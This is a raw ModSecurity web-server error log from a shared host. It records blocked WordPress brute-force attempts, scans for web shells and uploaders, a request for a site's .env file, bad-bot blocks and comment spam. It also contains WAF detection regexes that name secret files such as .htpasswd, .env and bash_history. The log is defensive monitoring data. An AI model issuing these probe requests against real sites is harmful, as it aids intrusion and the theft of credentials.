[Tue May 26 15:44:39.292968 2026] [security2:error] [pid 733610:tid 733754] [client 103.153.130.62:63270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyj8LL_4PasUNKBsfuXAAAAA4"]
[Tue May 26 15:44:39.293156 2026] [security2:error] [pid 733610:tid 733754] [client 103.153.130.62:63270] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyj8LL_4PasUNKBsfuXAAAAA4"]
[Tue May 26 15:44:39.944440 2026] [security2:error] [pid 745492:tid 745508] [remote 79.99.41.110:34966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.41.99.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVyj4mEQglTmoWcfxJpgQAA0ww"]
[Tue May 26 15:44:40.454234 2026] [security2:error] [pid 745492:tid 745718] [client 112.86.225.139:41138] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/"] [unique_id "ahVykImEQglTmoWcfxJpjgAAAOI"]
[Tue May 26 15:44:40.454368 2026] [security2:error] [pid 745492:tid 745718] [client 112.86.225.139:41138] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moes-art.com"] [uri "/"] [unique_id "ahVykImEQglTmoWcfxJpjgAAAOI"]
[Tue May 26 15:44:40.788394 2026] [security2:error] [pid 733610:tid 733792] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVykMLL_4PasUNKBsfuYwAAADQ"]
[Tue May 26 15:44:43.061774 2026] [security2:error] [pid 745492:tid 745627] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVykomEQglTmoWcfxJpqQAAAIc"]
[Tue May 26 15:44:45.117204 2026] [security2:error] [pid 745492:tid 745727] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVylImEQglTmoWcfxJpzQAAAOs"]
[Tue May 26 15:44:46.839003 2026] [security2:error] [pid 745492:tid 745625] [client 104.210.140.143:11030] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVylomEQglTmoWcfxJp5QAAhXw"]
[Tue May 26 15:44:46.997492 2026] [security2:error] [pid 745492:tid 745646] [client 104.210.140.141:12550] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVylomEQglTmoWcfxJp8gAAAJo"]
[Tue May 26 15:44:47.088141 2026] [security2:error] [pid 745492:tid 745732] [client 104.210.140.143:11030] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahVyl4mEQglTmoWcfxJp9QAA8H0"]
[Tue May 26 15:44:47.273918 2026] [security2:error] [pid 733610:tid 733832] [client 143.110.243.118:54126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/upload.php"] [unique_id "ahVyl8LL_4PasUNKBsfunwAAAFw"]
[Tue May 26 15:44:47.726550 2026] [security2:error] [pid 745492:tid 745699] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyl4mEQglTmoWcfxJp-QAAAM8"]
[Tue May 26 15:44:48.802532 2026] [security2:error] [pid 745492:tid 745680] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVymImEQglTmoWcfxJqEAAAALw"]
[Tue May 26 15:44:49.768719 2026] [security2:error] [pid 745492:tid 745669] [client 103.153.130.62:63554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVymYmEQglTmoWcfxJqKAAAALE"]
[Tue May 26 15:44:49.768881 2026] [security2:error] [pid 745492:tid 745669] [client 103.153.130.62:63554] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVymYmEQglTmoWcfxJqKAAAALE"]
[Tue May 26 15:44:51.719744 2026] [security2:error] [pid 745492:tid 745739] [client 88.151.32.54:56684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVymomEQglTmoWcfxJqNQAAAPc"]
[Tue May 26 15:44:51.759927 2026] [security2:error] [pid 745492:tid 745655] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVym4mEQglTmoWcfxJqSgAAAKM"]
[Tue May 26 15:44:54.111340 2026] [security2:error] [pid 733610:tid 733808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyncLL_4PasUNKBsfu4gAAAEQ"]
[Tue May 26 15:44:54.789577 2026] [security2:error] [pid 733610:tid 733799] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVynsLL_4PasUNKBsfu6QAAADs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 15:44:55.583994 2026] [security2:error] [pid 733610:tid 733814] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyn8LL_4PasUNKBsfu7AAAAEo"]
[Tue May 26 15:44:55.672972 2026] [security2:error] [pid 745492:tid 745656] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyn4mEQglTmoWcfxJqpAAAAKQ"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 15:44:55.996073 2026] [security2:error] [pid 745492:tid 745629] [client 222.254.176.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyn4mEQglTmoWcfxJqogAAAIk"]
[Tue May 26 15:44:56.757159 2026] [security2:error] [pid 745492:tid 745740] [client 143.110.243.118:34536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/shell.php"] [unique_id "ahVyoImEQglTmoWcfxJquAAAAPg"]
[Tue May 26 15:44:57.406781 2026] [security2:error] [pid 745492:tid 745634] [client 223.123.35.44:35768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyoYmEQglTmoWcfxJqwgAAAI4"]
[Tue May 26 15:44:57.406929 2026] [security2:error] [pid 745492:tid 745634] [client 223.123.35.44:35768] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyoYmEQglTmoWcfxJqwgAAAI4"]
[Tue May 26 15:44:57.828795 2026] [security2:error] [pid 745492:tid 745633] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyoYmEQglTmoWcfxJqyQAAAI0"]
[Tue May 26 15:44:58.761547 2026] [security2:error] [pid 733610:tid 733834] [client 143.110.243.118:34542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ahVyosLL_4PasUNKBsfvBQAAAF4"]
[Tue May 26 15:44:59.823170 2026] [security2:error] [pid 733610:tid 733776] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyo8LL_4PasUNKBsfvDgAAACQ"]
[Tue May 26 15:45:00.285784 2026] [security2:error] [pid 745492:tid 745636] [client 103.153.130.62:63836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVypImEQglTmoWcfxJq7gAAAJA"]
[Tue May 26 15:45:00.285903 2026] [security2:error] [pid 745492:tid 745636] [client 103.153.130.62:63836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVypImEQglTmoWcfxJq7gAAAJA"]
[Tue May 26 15:45:01.294151 2026] [security2:error] [pid 745492:tid 745733] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVypImEQglTmoWcfxJq-wAAAPE"]
[Tue May 26 15:45:02.853730 2026] [security2:error] [pid 745492:tid 745741] [client 85.208.96.195:58516] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVypomEQglTmoWcfxJrGAAAAPk"]
[Tue May 26 15:45:02.853867 2026] [security2:error] [pid 745492:tid 745741] [client 85.208.96.195:58516] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVypomEQglTmoWcfxJrGAAAAPk"]
[Tue May 26 15:45:03.795742 2026] [security2:error] [pid 745492:tid 745660] [client 88.151.32.54:56686] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVypomEQglTmoWcfxJrEgAAAKg"]
[Tue May 26 15:45:04.098229 2026] [security2:error] [pid 745492:tid 745665] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyp4mEQglTmoWcfxJrJQAAAK0"]
[Tue May 26 15:45:04.540379 2026] [security2:error] [pid 733610:tid 733843] [client 176.65.139.238:26308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "earthone.me"] [uri "/.env"] [unique_id "ahVyqMLL_4PasUNKBsfvPAAAAGc"]
[Tue May 26 15:45:05.288982 2026] [security2:error] [pid 745492:tid 745720] [client 5.35.37.26:52587] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyqYmEQglTmoWcfxJrRgAAAOQ"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 15:45:05.289081 2026] [security2:error] [pid 745492:tid 745720] [client 5.35.37.26:52587] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyqYmEQglTmoWcfxJrRgAAAOQ"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 15:45:05.541344 2026] [security2:error] [pid 733610:tid 733778] [client 143.110.243.118:34546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/uploader.php"] [unique_id "ahVyqcLL_4PasUNKBsfvQwAAACY"]
[Tue May 26 15:45:05.787471 2026] [autoindex:error] [pid 745492:tid 745746] [client 194.163.177.168:58194] AH01276: Cannot serve directory /home1/moesartc/public_html/veganfoodindia.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 15:45:05.791352 2026] [security2:error] [pid 745492:tid 745631] [client 114.119.156.227:63459] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/wp-content/uploads/2022/09/home_pic-1.png"] [unique_id "ahVyqYmEQglTmoWcfxJrUAAAAIs"], referer: https://obinnawrites.com/wp-content/uploads/2022/09/home_pic-1.png
[Tue May 26 15:45:05.883877 2026] [security2:error] [pid 733610:tid 733783] [client 5.35.37.26:52625] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyqcLL_4PasUNKBsfvRgAAACs"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 15:45:05.884006 2026] [security2:error] [pid 733610:tid 733783] [client 5.35.37.26:52625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyqcLL_4PasUNKBsfvRgAAACs"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 15:45:06.604572 2026] [security2:error] [pid 733610:tid 733767] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyqsLL_4PasUNKBsfvTwAAABs"]
[Tue May 26 15:45:07.565330 2026] [security2:error] [pid 733610:tid 733754] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyq8LL_4PasUNKBsfvZQAAAA4"]
[Tue May 26 15:45:07.710998 2026] [security2:error] [pid 733610:tid 733801] [client 88.151.32.54:56688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyqsLL_4PasUNKBsfvWQAAAD0"]
[Tue May 26 15:45:10.057162 2026] [security2:error] [pid 745492:tid 745534] [remote 173.249.15.100:42942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVyrYmEQglTmoWcfxJrcgAAjSY"]
[Tue May 26 15:45:10.345654 2026] [security2:error] [pid 745492:tid 745684] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyrYmEQglTmoWcfxJrdAAAAMA"]
[Tue May 26 15:45:10.568475 2026] [security2:error] [pid 745492:tid 745536] [remote 95.216.117.13:50026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVyromEQglTmoWcfxJrfAAA6Cg"]
[Tue May 26 15:45:11.026066 2026] [security2:error] [pid 733610:tid 733834] [client 103.153.130.62:64118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyrsLL_4PasUNKBsfvjQAAAF4"]
[Tue May 26 15:45:11.026257 2026] [security2:error] [pid 733610:tid 733834] [client 103.153.130.62:64118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyrsLL_4PasUNKBsfvjQAAAF4"]
[Tue May 26 15:45:12.455867 2026] [security2:error] [pid 745492:tid 745662] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVysImEQglTmoWcfxJriwAAAKo"]
[Tue May 26 15:45:13.416870 2026] [security2:error] [pid 733610:tid 733746] [client 88.151.32.54:56688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVysMLL_4PasUNKBsfvpAAAAAY"]
[Tue May 26 15:45:14.390721 2026] [security2:error] [pid 733610:tid 733740] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyscLL_4PasUNKBsfvvQAAAAA"]
[Tue May 26 15:45:15.956527 2026] [security2:error] [pid 745492:tid 745669] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVys4mEQglTmoWcfxJrtgAAALE"]
[Tue May 26 15:45:16.025159 2026] [security2:error] [pid 745492:tid 745712] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVys4mEQglTmoWcfxJrvQAAANw"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:45:16.844343 2026] [security2:error] [pid 733610:tid 733744] [client 54.205.63.235:62684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVytMLL_4PasUNKBsfv6wAAAAQ"]
[Tue May 26 15:45:16.918495 2026] [security2:error] [pid 733610:tid 733754] [client 54.205.63.235:63135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVytMLL_4PasUNKBsfv7AAAAA4"]
[Tue May 26 15:45:16.918781 2026] [security2:error] [pid 745492:tid 745675] [client 54.205.63.235:63134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVytImEQglTmoWcfxJr0gAAALc"]
[Tue May 26 15:45:16.919455 2026] [security2:error] [pid 745492:tid 745743] [client 54.205.63.235:63137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVytImEQglTmoWcfxJr0wAAAPs"]
[Tue May 26 15:45:16.919726 2026] [security2:error] [pid 733610:tid 733819] [client 54.205.63.235:63138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVytMLL_4PasUNKBsfv7gAAAE8"]
